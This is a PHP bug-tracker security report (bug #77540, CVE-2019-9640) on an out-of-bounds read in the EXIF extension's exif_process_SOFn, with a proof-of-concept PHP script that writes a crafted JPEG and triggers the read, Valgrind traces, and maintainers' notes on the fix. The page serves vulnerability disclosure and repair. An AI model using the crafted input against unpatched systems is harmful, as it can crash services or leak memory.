php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #77540 Invalid Read on exif_process_SOFn
Submitted: 2019-01-29 13:17 UTC Modified: 2019-03-12 19:55 UTC
From: chamal dot desilva at gmail dot com Assigned: stas (profile)
Status: Closed Package: EXIF related
PHP Version: 7.1.26 OS: Windows, Linux
Private report: No CVE-ID: 2019-9640
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: chamal dot desilva at gmail dot com
New email:
PHP Version: OS:

 

 [2019-01-29 13:17 UTC] chamal dot desilva at gmail dot com
Description:
------------
Version
-------
PHP 7.3.1
PHP 7.4.0-dev (cli)

Description
-----------
This  bug is present in exif_scan_thumbnail method of ext/exif/exif.c file.
These lines in exif_scan_thumbnail method causes this bug.

...
case M_SOF15:
        //exif_process_SOFn method reads 7 bytes from "uchar *data" pointer.
        // exif_process_SOFn or exif_scan_thumbnail methods don't validate
        //that "uchar *data" pointer has enough data to read.
	exif_process_SOFn(data+pos, marker, &sof_info);
....

Configure Line
---------------
./configure --prefix=/dir-name/install --enable-cli --enable-exif --enable-debug --without-pear




Test script:
---------------
<?php
$width = 0;
$height = 0;
$filename = dirname(__FILE__).DIRECTORY_SEPARATOR.'test.jpg';
file_put_contents($filename,hex2bin("ffd8e100554578696600004d4d002a0000000c00000000000000000012000302020001000000010500000001110001000000013d000000010100010000000101000000da00020000ffd8ffcf000000000000000000000000da0002"));
$s = exif_thumbnail($filename, $width, $height);
echo "Width ".$width."<br>";
echo "Height ".$height;
?>

Actual result:
--------------
Valgrind Output
---------------
Source line numbers are from PHP 7.3.1

export ZEND_DONT_UNLOAD_MODULES=1
export USE_ZEND_ALLOC=0
valgrind ./php/TestCases/test.php

==3659== Invalid read of size 1
==3659==    at 0x24C2E4: exif_process_SOFn (exif.c:2632)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccbe is 0 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24A45B: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C2FA: exif_process_SOFn (exif.c:2633)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccbf is 1 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24A46C: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C2FA: exif_process_SOFn (exif.c:2633)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc0 is 2 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24A45B: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C311: exif_process_SOFn (exif.c:2634)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc1 is 3 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24A46C: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C311: exif_process_SOFn (exif.c:2634)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc2 is 4 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24C323: exif_process_SOFn (exif.c:2635)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc3 is 5 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2019-01-30 10:49 UTC] cmb@php.net
-Status: Open +Status: Verified -PHP Version: 7.3.1 +PHP Version: 7.1Git-2019-01-30 (Git)
 [2019-01-30 10:49 UTC] cmb@php.net
Thanks for reporting!  Apparently, all relevant versions (i.e. PHP-7.1+) are affected.
 [2019-03-02 21:39 UTC] stas@php.net
-Status: Verified +Status: Assigned -PHP Version: 7.1Git-2019-01-30 (Git) +PHP Version: 7.1.26 -Assigned To: +Assigned To: stas -CVE-ID: +CVE-ID: needed
 [2019-03-02 21:39 UTC] stas@php.net
Proposed fix in security repo as b079e1b50d8d0316f600477c5da55c81bb08b55f and in https://gist.github.com/smalyshev/4fb847b0da0a387f651aa393f1d22a96

Please verify.
 [2019-03-04 07:35 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=5f0e62a3e5b525163e538aaab0161c2c8c5d057b
Log: Fix bug #77540 - Invalid Read on exif_process_SOFn
 [2019-03-04 07:35 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2019-03-04 07:35 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=30d2b94a2e88021b77b07149e1f4438662ca8e5e
Log: Fix bug #77540 - Invalid Read on exif_process_SOFn
 [2019-03-12 08:28 UTC] chamal dot desilva at gmail dot com
Is it possible to add a CVE ID for this bug?
 [2019-03-12 19:55 UTC] stas@php.net
-CVE-ID: needed +CVE-ID: 2019-9640
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Wed Sep 18 12:01:27 2024 UTC